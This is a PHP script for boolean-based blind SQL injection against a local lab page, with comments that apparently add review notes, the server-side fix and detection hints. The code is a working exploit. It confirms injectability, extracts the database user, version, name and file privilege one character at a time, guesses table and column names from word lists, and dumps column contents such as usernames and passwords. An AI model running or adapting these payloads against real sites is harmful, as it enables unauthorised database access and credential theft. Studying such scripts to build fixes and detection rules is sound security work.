<?php
// Boolean-based blind SQL injection probe against a local lab endpoint ($url).
// Review notes only -- the code is left exactly as pasted. Every step below is a
// plain GET to $url with a payload appended to the "comment=1" parameter, so a
// full run shows up in the target's access log as a burst of requests that differ
// only in that query string; the server-side fix is a parameterised query for the
// "comment" parameter, and the request pattern (one request per candidate
// character, no pauses -- see the sleep() note below) is what a rate-based or
// payload-based detection rule would key on.

// Target endpoint; nothing here is read from the command line or the network.
$url   = "http://localhost/playground/sqli/blind/blind.php?comment=1";

// Word list of table names to test for existence.
$tables = [
     "table_user",
     "table_content",
     "table_comment",
     "table_users",
     "table_member",
     "table_admin",
     "table_halaman"
];
// Word list of column names to test inside each table that was found.
$columns = [
     "uname",
     "user",
     "name",
     "username",
     "password",
     "email",
     "id",
     "comment",
     "judul",
     "content"
];
// Candidate character set for the per-position guesses: "+" and "," plus
// range("~","-"), i.e. every byte from '~' (0x7E) down to '-' (0x2D); sorted so
// the guesses are tried in ascending byte order.
$datas = ["+",","];
$datas = array_merge($datas,range("~","-"));
sort($datas);

//list of query
// $query1: a false/true payload pair used to record two baseline responses.
// $query2: expressions whose value is recovered one character at a time.
$query1 = array("+and+false","+and+true");
$query2 = array("user()","version()","database()","(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)");

//test for sql injection
// If the false and true payloads return different pages the parameter is treated
// as injectable; otherwise the script stops here via die().
$req1 = file_get_contents($url . $query1[0]);
$req2 = file_get_contents($url . $query1[1]);
if($req1 !== $req2){
     echo "\n[+] probably, it's possible to blind sql injection\n";
}else{
     die("\n[-] we're not sure that it's possible to blind sql injection\n");
}

//checking version,user,and database name
// For each expression in $query2, up to 20 positions are recovered. At each
// position every candidate in $datas is sent and the first one whose response
// equals the "true" baseline ($req2) is printed. There is no else branch: when
// no candidate matches (for example past the end of the value) nothing is
// printed and the position simply advances.
echo "[+] we're looking for common information of it's database\n";
foreach($query2 as $x){
     if($x == "(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)"){
          echo "\n[*] FILE_PRIV\t: ";
     }else{
          $zz = strtoupper(str_replace("()","",$x));
          echo "\n[*] {$zz}\t: ";
     }
     for($itung = 1; $itung <= 20; $itung++):
          foreach($datas as $z){
               $query = "+and+BINARY+substring({$x},{$itung},1)='{$z}'";
               $req   = file_get_contents($url . $query);
               if($req === $req2):
                    echo $z;
                    break;
               endif;
          }
          // sleep() takes an int; 0.30 is converted to 0 (a deprecation notice
          // on PHP 8.1+), so there is effectively no pause and the requests for
          // consecutive positions go out back-to-back.
          sleep(0.30);
     endfor;
}
echo "\n\n";

// One request per candidate table name; a response equal to the "true" baseline
// means "SELECT 1 FROM <table> LIMIT 0,1" succeeded, i.e. the table exists.
$table_found = array();
echo "[+] we are looking for table name\n\n";
foreach($tables as $x){
     $query = "+and+(SELECT+1+FROM+{$x}+LIMIT+0,1)=1";
     $req   = file_get_contents($url . $query);
     if($req === $req2):
          echo "[*] {$x}\n";
          $table_found[] = $x;
     endif;
}
echo "\n";

// For every table found, each column name is first tested for existence (the
// CONCAT(1,<col>) probe is "true" only when the column resolves), then up to 100
// characters of GROUP_CONCAT(<col>) are recovered with the same guess loop as
// above. Note that $query1 here overwrites the array defined earlier; the array
// is not used again, so this is harmless.
echo "[+] dumping the whole of datas of all the tables\n\n";
foreach($table_found as $x){
     echo "[+] from table {$x}\n\n";
     foreach($columns as $z){
          $query = "+AND+(SELECT+SUBSTRING(CONCAT(1,{$z}),1,1)+FROM+{$x}+LIMIT+0,1)=1";
          $req   = file_get_contents($url . $query);
          if($req === $req2):
               echo "[*] {$z}\t : ";
               for($xx = 1;$xx <= 100; $xx++):
                    foreach($datas as $zz){
                         $query1 = "+and+BINARY+substring((SELECT+group_concat({$z})+FROM+{$x}),{$xx},1)='{$zz}'";
                         $req    = file_get_contents($url . $query1);
                         if($req === $req2):
                              // A matched "+" is printed as a space -- presumably
                              // because "+" in the query string is URL-decoded to
                              // a space server-side; confirm against the target.
                              if($zz === "+"):
                                   $zz = " ";
                              endif;
                              echo $zz;
                              break;
                         endif;
                    }
               endfor;
               echo "\n";
          endif;
     }
     echo "\n";
}

?>